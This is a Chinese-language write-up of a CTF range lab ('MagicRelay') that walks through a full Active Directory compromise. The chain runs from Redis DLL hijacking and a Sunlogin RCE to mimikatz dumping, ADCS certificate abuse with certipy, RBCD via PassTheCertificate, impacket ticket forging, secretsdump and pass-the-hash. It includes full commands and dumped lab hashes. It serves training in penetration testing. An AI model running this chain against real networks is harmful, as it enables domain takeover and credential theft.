春秋云镜-MagicRelay

前言

刚结束最近的 HW，状态不佳，草草拿了个第二结束。结束后，抽出时间来写个漏洞扫描模块，其实在前面就已经写好了大纲，在刚结束的那场 HW 就用上了，但仍没打磨完善，不过也达到了我的预期效果，初衷是通过它来快速完成外网资产的端口扫描和指纹识别，不需要完成其他繁杂的任务，因此只要完成端口扫描--> 服务识别 --> web 指纹识别 --> 漏洞 POC/弱口令检测的链路即可。

flag01

正好看看春秋云镜的机器，完成一次全端口扫描的耗时

耗时 144 秒，两分钟左右，在可以接受的范围，速度还可以通过调并发量来提高，不过在实战中，再快就很容易被封了。

看看扫描结果，主要是开了 3389 和 6379 端口的 redis 服务，并且是未授权

但通过路径看到系统类型是 windows，因为没有相关 web 服务，排除了写文件的可能后，使用 dll 劫持，详细说明见先知的这篇文章：https://xz.aliyun.com/news/13892

按照文章生成对应的 dbghelp.dll 文件，使用 RABR 进行主从复制

执行完后，vshell 就可以看到成功上线了

顺利获取到第一个 flag

这里翻文件的时候是看见有域环境的，先放着

flag02

传 fscan 到机器上执行内网扫描

不得不说，2.0 的 fscan 相比 1.0 系列，结果显得有点乱，所以这里直接截图带过，总结一下扫描信息

172.22.12.25 我们的入口机器，redis未授权
172.22.12.6 DC机器
172.22.12.12 IIS服务，存在Active Directory 域权限提升漏洞
172.22.12.31 ftp存在匿名登录

连接 ftp

有一个向日葵安装包，可能这台机器上安装了向日葵，对这台机器的高端口范围进行扫描 30000-50000

并且是 system 权限

这台机器不在域环境，而是工作组，直接读取 flag 就行

xrkRce.exe -t rce -h 172.22.12.31 -p 49687 -c "type C:UsersAdministratorflagflag02.txt"

顺利拿到 flag 之后，没有其他突破点，继续回去看第一台机器，因为第一台机器前面是知道在域环境中的。

Flag04

因为第一台机器是 administrators 权限，我们添加用户 rdp

创建新用户dotast
net user dotast qwer1234! /add
将用户dotast添加至管理员组
net localgroup administrators dotast /add

通过微软的工具 PsExec.exe 提到 system 权限

然后上传 mimikatz.exe 抓取机器用户哈希

mimikatz.exe "privilege::debug""sekurlsa::logonpasswords""exit"

WIN-YUYAOX9Q$/e611213c6a712f9b18a8d056005a4f0f

这里为什么不收集域环境信息呢？因为前面入口机器就扫到了 ADCS，用脚想都知道准备考什么了，还是老内容。

惯例扫一下获取 ca 名称

Certify.exe find /vulnerable

xiaorang-WIN-AUTHORITY-CA

配置hosts

172.22.12.6 WIN-SERVER.xiaorang.lab
172.22.12.12 WIN-AUTHORITY.xiaorang.lab

通过 certipy 创建一个机器账号 HACK1，并且设置 DNS Host Name 为域控的 WIN-SERVER.xiaorang.lab

proxychains certipy account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f  -dc-ip 172.22.12.6 -user HACK1 -pass Qwer1234 -dns WIN-SERVER.xiaorang.lab -debug

用该机器账户向 ca 请求证书

proxychains certipy req -u HACK1$@xiaorang.lab -p Qwer1234 -target 172.22.12.12 -ca "xiaorang-WIN-AUTHORITY-CA" -template Machine -debug -dc-ip 172.22.12.6

用申请到的证书进行 PKINIT Kerberos 身份认证，获取域控制器账号 TGT 票据

proxychains certipy auth -pfx win-server.pfx -dc-ip 172.22.12.6 -debug

预料之内，情理之中，云镜靶场就没成功过一次。

先转换一下请求到的证书格式

certipy cert -pfx win-server.pfx > cert.pem

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

然后上传到入口机器上，通过证书认证到 LDAPS，添加机器账户 HACK2，并设置 HACK2 到域控制器 XR-DC01 的 WIN-SERVER

PassTheCertificate.exe -CertPath .cert.pfx -CertPassword 123456 -MachineAccount HACK2$ -MachinePassword Qwer1234 -Target "CN=WIN-SERVER,OU=Domain Controllers,DC=xiaorang,DC=lab"

使用 impacket 的 getST.py 生成票据

proxychains impacket-getST xiaorang.lab/HACK2$:Qwer1234 -dc-ip 172.22.12.6 -spn cifs/WIN-SERVER.xiaorang.lab -impersonate Administrator

然后使用生成的 Administrator.ccache 票据获取系统管理员权限

export KRB5CCNAME=Administrator.ccache
proxychains impacket-wmiexec WIN-SERVER.xiaorang.lab -no-pass -k -dc-ip 172.22.12.6

获取 flag

flag03

转储域管哈希

proxychains impacket-secretsdump 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -k

Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::

然后 pth 拿最后一台机器的 flag

proxychains crackmapexec smb 172.22.12.12 -u administrator -Haa95e708a5182931157a526acf769b13 -d xiaorang.lab -x "type UsersAdministratorflag03.txt"